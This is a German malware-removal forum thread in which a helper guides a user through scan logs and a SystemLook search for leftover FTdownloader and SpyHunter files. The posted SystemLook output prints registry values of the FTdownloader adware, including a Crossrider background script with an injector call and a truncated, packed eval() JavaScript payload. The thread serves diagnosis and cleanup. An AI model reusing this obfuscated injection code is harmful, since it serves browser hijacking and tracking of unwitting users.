Trojaner-Board
Seite 2 von 5 1 2 34 Letzte »
100 Beiträge dieses Themas auf einer Seite anzeigen

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   SpyHunter4 als Pc-Scanner... (https://www.trojaner-board.de/139699-spyhunter4-pc-scanner.html)

Minter 13.08.2013 08:35
Code:
ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=323582ef8fe5a842a20b36033251bb5e
# engine=14752
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2013-08-13 06:21:36
# local_time=2013-08-13 08:21:36 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5122 16777213 100 90 2493439 125161092 0 0
# compatibility_mode=5893 16776573 100 94 3003334 128004746 0 0
# scanned=191261
# found=0
# cleaned=0
# scan_time=8465
Its das das richige Log?

cosinus 13.08.2013 08:47
Ja. Das Log von Malwarebytes fehlt

Minter 13.08.2013 09:10
Code:
Malwarebytes Anti-Malware (Test) 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2013.08.12.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 10.0.9200.16540
Moritz :: MORITZ-PC [Administrator]

Schutz: Aktiviert

13.08.2013 10:06:40
mbam-log-2013-08-13 (10-06-40).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 240837
Laufzeit: 3 Minute(n), 2 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 0
(Keine bösartigen Objekte gefunden)

(Ende)

cosinus 13.08.2013 09:14
Sieht soweit ok aus :daumenhoc

Wegen Cookies und anderer Dinge im Web: Um die Pest von vornherein zu blocken (also TrackingCookies, Werbebanner etc.) müsstest du dir mal sowas wie MVPS Hosts File anschauen => Blocking Unwanted Parasites with a Hosts File - sinnvollerweise solltest du alle 4 Wochen mal bei MVPS nachsehen, ob er eine neue Hosts Datei herausgebracht hat.

Info: Cookies sind keine Schädlinge direkt, aber es besteht die Gefahr der missbräuchlichen Verwendung (eindeutige Wiedererkennung zB für gezielte Werbung o.ä. => HTTP-Cookie )

Ansonsten gibt es noch gute Cookiemanager, Erweiterungen für den Firefox zB wäre da CookieCuller
Wenn du aber damit leben kannst, dich bei jeder Browsersession überall neu einzuloggen (zB Facebook, Ebay, GMX, oder auch Trojaner-Board) dann stell den Browser einfach so ein, dass einfach alles beim Beenden des Browser inkl. Cookies gelöscht wird.

Ist dein System nun wieder in Ordnung oder gibt's noch andere Funde oder Probleme?

Minter 13.08.2013 09:33
Nun ich habe unter C:\ Programme (x86) einen Ordner mit dem Namen: FTdownloader V4.0 gefunden. Wie bereits erwähnt hatte ich auch mal (oder immer noch) den ftdownloader auf meinem Computer. ich nehme mal, dass das das selbe ist wie vorher auch. Muss ich mir das jetzt Gedanken machen? Und wenn ja, wie bekomme ich das wieder weg. Einfach löschen?
Und SpyHunter befindent sich immer noch auf dem Desktop.

cosinus 13.08.2013 09:37
Scan mit SystemLook (x64)

Lade SystemLook von jpshortstuff von einem der folgenden Spiegel herunter und speichere das Tool auf dem Desktop.
SystemLook (64 bit)
  • Doppelklicke auf die SystemLook_x64.exe, um das Tool zu starten.
  • Kopiere den Inhalt der folgenden Codebox in das Textfeld des Tools:
    Code:
    :filefind
    *FTdownloader*
    *Spyhunter*

    :folderfind
    *FTdownloader*
    *Spyhunter*

    :regfind
    FTdownloader
    Spyhunter
  • Klicke nun auf den Button Look, um den Scan zu starten.
  • Der Suchlauf kann einige Zeit dauern.
  • Wenn der Suchlauf beendet ist, wird sich Dein Editor mit den Ergebnissen öffnen, poste diese in deinen Thread.
  • Die Ergebnisse werden auf dem Desktop als SystemLook.txt gespeichert.

Minter 13.08.2013 09:42
Code:
SystemLook 30.07.11 by jpshortstuff
Log created at 10:39 on 13/08/2013 by Moritz
Administrator - Elevation successful

========== filefind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll        --a---- 393216 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe        --a---- 338432 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll        --a---- 473088 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe        --a---- 442880 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0.ico        --a---- 9662 bytes        [11:19 30/06/2013]        [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk        --a---- 726 bytes        [07:36 13/08/2013]        [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader        --a---- 4256 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler        --a---- 4166 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job        --a---- 1226 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] 3FB5E9A85AA0F499D86530241DACB64B
C:\Windows\Tasks\FTdownloader V4.0-enabler.job        --a---- 1136 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] FF2CF9A43027FE63CBF838105BF502B4
C:\Windows\Tasks\FTdownloader V4.0-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] F62D368B093CC484B99E203338E25C37

Searching for "*Spyhunter*"
C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe        --a---- 7529344 bytes        [21:46 27/06/2013]        [21:46 27/06/2013] 64F7854468F5D54389D9E0500FD47FE8
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_191644.log        --a---- 64781 bytes        [17:16 11/08/2013]        [17:16 11/08/2013] 4AF03E4352D537823CA8F755E055A4C8
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_193743.log        --a---- 124907 bytes        [17:37 11/08/2013]        [18:46 11/08/2013] 90D16F35B0521DE18E8EB3385E20C39A
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_204654.log        --a---- 69511 bytes        [18:46 11/08/2013]        [18:49 11/08/2013] 43C73565F0B32BA34160D8B992742ABA
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_205012.log        --a---- 69511 bytes        [18:50 11/08/2013]        [19:06 11/08/2013] 693434F81C3E8E626A174F255379A5E4
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_210735.log        --a---- 122372 bytes        [19:07 11/08/2013]        [20:54 11/08/2013] 3F1C0E96D485B0059E71DC7536B93606
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_091522.log        --a---- 123665 bytes        [07:15 12/08/2013]        [07:47 12/08/2013] 3EF394D1CF6424373116E4B5828D329B
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_094843.log        --a---- 121749 bytes        [07:48 12/08/2013]        [08:29 12/08/2013] 6B4D540A516D2459989142FEB12D1C36
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_113256.log        --a---- 124488 bytes        [09:32 12/08/2013]        [12:04 12/08/2013] D74F81776EBAB6EA51825AF9C450C271
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154235.log        --a---- 64781 bytes        [13:42 12/08/2013]        [13:42 12/08/2013] 6EA9F0164892524F8EDDFCE854A429F4
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154539.log        --a---- 64781 bytes        [13:45 12/08/2013]        [13:45 12/08/2013] C4F99D3D094BCE3CA34F437DBAED5E32
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154601.log        --a---- 64781 bytes        [13:46 12/08/2013]        [13:46 12/08/2013] 37956886F3A17C6969B78E750AFFF8C7
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154900.log        --a---- 70451 bytes        [13:49 12/08/2013]        [14:12 12/08/2013] 40D07F2B569EEE3B5C216CE968F30B2D
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_161543.log        --a---- 71659 bytes        [14:15 12/08/2013]        [15:09 12/08/2013] 38B208EFBC7B7C1FDE261AF114408962
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_171026.log        --a---- 64468 bytes        [15:10 12/08/2013]        [15:10 12/08/2013] A3E3269035435A4E024B338BC02E0CF3
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_181932.log        --a---- 69690 bytes        [16:19 12/08/2013]        [16:41 12/08/2013] 69F7C219CC65205A2FEAB591DFA3CB1B
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_213506.log        --a---- 70848 bytes        [19:35 12/08/2013]        [21:09 12/08/2013] 84C23063CDD28F4446302A186FD0EBB6
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130813_092707.log        --a---- 69556 bytes        [07:27 13/08/2013]        [07:27 13/08/2013] 144FEF3F2843E12EC24BA4575E7385CF
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\SpyHunter.lnk        --a---- 12130 bytes        [13:26 12/08/2013]        [13:26 12/08/2013] 7FB1162DAB9E2DA90C88CCECD0C87808
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\SpyHunter Emergency Startup.lnk        --a---- 1912 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 016E6144CB2740A114B29DF603AA053B
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\SpyHunter.lnk        --a---- 2254 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] CC9E6FC3C818F1BD8DEDA8EFCFCBF153
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\Uninstall SpyHunter.lnk        --a---- 996 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 73D176BF77F99B33447A07B40601A0E8
C:\Users\Moritz\Desktop\SpyHunter.lnk        --a---- 2218 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 63289515C1643D0B1535387F7E1FEDF1
C:\Users\Moritz\Downloads\SpyHunter-Installer(1).exe        --a---- 726464 bytes        [08:31 27/07/2013]        [08:31 27/07/2013] EEA0B34B60632083F2A75352BAE365FB
C:\Users\Moritz\Downloads\SpyHunter-Installer.exe        --a---- 726464 bytes        [08:25 27/07/2013]        [08:25 27/07/2013] EEA0B34B60632083F2A75352BAE365FB
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf        --a---- 165806 bytes        [17:24 27/07/2013]        [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8
C:\Windows\System32\Tasks\SpyHunter4Startup        --a---- 3332 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 1E01CD65C6C6A6EA6EF2B7AE37BB57E7

========== folderfind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0        d------        [12:15 26/07/2013]
C:\Users\Moritz\AppData\Local\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou        d------        [12:15 26/07/2013]

Searching for "*Spyhunter*"
C:\Program Files\Enigma Software Group\SpyHunter        d------        [08:42 27/07/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter        d------        [08:42 27/07/2013]

========== regfind ==========

Searching for "FTdownloader"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==\\\"0\\\"){4S()}1O if(a.2V!=\\\"1\\\"||
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
@="FTDownloader URI"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
"Content Type"="application/x-FTDownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\DefaultIcon]
@="C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\shell\open\command]
@=""C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe" /u="%1""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FTdownloader V4.0]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp]
"path"="C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"

Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter]
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig]
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig]
"InstallLoc"="C:\Program Files\Enigma Software Group\SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
